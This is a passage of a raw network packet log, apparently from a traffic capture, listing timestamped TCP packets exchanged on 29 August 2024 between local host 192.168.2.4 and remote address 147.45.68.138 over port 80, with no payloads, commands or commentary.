                                                      Aug 29, 2024 22:52:28.518699884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518703938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518723011 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518728018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518738031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518742085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518753052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518764973 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518764973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518774986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518778086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.518788099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518809080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.518816948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.546225071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.551086903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.731949091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.731977940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.731996059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732007027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732017994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732028008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732036114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732040882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732053041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732062101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732064962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732075930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732088089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732095003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732111931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732115984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732125044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732131958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732141972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732151985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732152939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732168913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732172012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732182026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732191086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732192039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732206106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732215881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732240915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732253075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732274055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732285023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732290983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732295990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732312918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732317924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732323885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732340097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732367992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732506037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732530117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732541084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732547998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732570887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732582092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732655048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732682943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732692957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732723951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732728004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732738972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732773066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732798100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732830048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732836962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732841015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732876062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732881069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732892036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732903004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732913017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.732927084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732939005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.732964993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733002901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733051062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733062029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733087063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733097076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733108997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733110905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733120918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733135939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733143091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733144999 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733155966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733164072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733186960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733201027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733218908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733237028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733247995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733258963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733283997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733285904 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733310938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733313084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733321905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733338118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733367920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733386993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733397961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.733434916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.733448029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734025002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734047890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734059095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734067917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734088898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734091997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734106064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734116077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734117985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734129906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734141111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734143019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734159946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734170914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734170914 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734178066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734183073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734194994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734205961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734206915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.734230042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.734256029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.743488073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.749361038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968014956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968044996 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968056917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968067884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968080044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968097925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968107939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968110085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968125105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968136072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968148947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968151093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968170881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968195915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968677044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968688965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968720913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968729019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968733072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968745947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968756914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968760014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968769073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968777895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968806028 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968841076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968852043 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968869925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968879938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968887091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968903065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968914032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968924046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968925953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968935966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.968940020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968964100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.968992949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969436884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969485044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969504118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969520092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969527960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969532967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969546080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969557047 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969580889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969733000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969744921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969755888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969773054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969777107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969795942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969810009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969822884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969831944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969846964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969850063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969863892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969871998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969877005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969888926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.969890118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969918966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.969932079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970707893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970721006 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970731974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970758915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970769882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970772982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970781088 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970793962 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970793962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970830917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970834017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970834017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970841885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970853090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.970860004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970860004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.970894098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.971952915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.971966028 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.971976995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972023964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972044945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972409964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972454071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972466946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972515106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972522020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972527027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972552061 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972553968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972558022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972567081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972578049 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972604036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972605944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972619057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972629070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972630978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972640991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972677946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972677946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972677946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972680092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972687960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972692966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972712040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972728968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972739935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972743988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972749949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972753048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972774982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972781897 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972793102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972801924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972803116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972817898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972829103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972850084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972855091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972868919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972879887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972887039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972892046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972902060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972912073 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972914934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972923040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.972934008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972950935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.972975016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974071980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974104881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974114895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974149942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974154949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974173069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974184990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974206924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974214077 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974225044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974234104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974237919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974251032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974260092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974261045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.974280119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.974294901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.975204945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.975239038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.975248098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.975250959 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.975272894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.975279093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.975289106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.975316048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.975982904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.975994110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976003885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976015091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976028919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976031065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976052999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976053953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976067066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976068974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976078033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976089001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976094007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976099968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976106882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976111889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976125956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976142883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976150990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976157904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976169109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976180077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976181030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976193905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.976202965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.976229906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.979307890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979317904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979329109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979352951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979362965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979368925 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.979374886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.979382992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.979408979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.077905893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.077924967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.077934980 CEST8049739147.45.68.138192.168.2.4
